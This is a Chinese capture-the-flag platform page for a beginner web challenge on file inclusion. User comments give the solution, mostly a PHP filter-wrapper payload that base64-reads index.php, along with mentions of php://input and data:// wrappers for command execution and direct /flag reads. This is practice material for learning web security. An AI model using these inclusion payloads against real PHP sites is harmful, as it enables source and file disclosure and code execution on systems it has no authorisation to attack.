文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 12915
提  示:
描  述:
flag{}
评论
Ywctf 1月前

/?file=php://filter/read=convert.base64-encode/resource=index.php

回复 1

帅帅123 1月前

发现参数?file= 怀疑是文件读取或者目录穿越 尝试php为协议 命令执行:php://input data://text/plain,<?php ?> 字节流编码读取: php://filter/conver.base64-encode/resource=index.php

回复 0

奔跑的开开 2月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

ok了 4月前

?file=php://filter/read=convert.base64-encode/resource=index.php 秒了

回复 0

VVang 4月前

用php://filter包含index.php,然后base64解码得到flag

回复 1

聪10011 4月前

猜flag位置,file=/flag

回复 1

8208240204 5月前

?file=php://filter/read=convert.base64-encode/resource=index.php 然后发现==表明是base64解码得到flag

回复 1

2686213396 6月前

http://117.72.52.127:17540/index.php?file=php://filter/convert.base64-encode/resource=index.php,php伪协议,读取 index.php文件

回复 0

zhuizhui 6月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

17734916426 8月前

index.php?file=/flag

回复 2

WriteUp

image
harry

2 金币

评分(11)

解题动态

SkyAsh 攻破了该题 10小时前
skl 攻破了该题 1天前
li1933831016 攻破了该题 1天前
fadingpill 攻破了该题 2天前
scanner11 攻破了该题 2天前
Niko_83c 攻破了该题 2天前
k1234 攻破了该题 2天前
漏洞界的萝莉 攻破了该题 2天前
巴咕噜182 攻破了该题 2天前
hubine9485 攻破了该题 2天前
602048 攻破了该题 3天前
EMObg 攻破了该题 3天前
李逍遥逛霍格沃茨 攻破了该题 3天前
TLSY 攻破了该题 3天前
陌兮li 攻破了该题 3天前
123jiji 攻破了该题 4天前
jjlll 攻破了该题 5天前
jyx 攻破了该题 5天前
或许kkk 攻破了该题 5天前
fandebiao 攻破了该题 5天前
问题反馈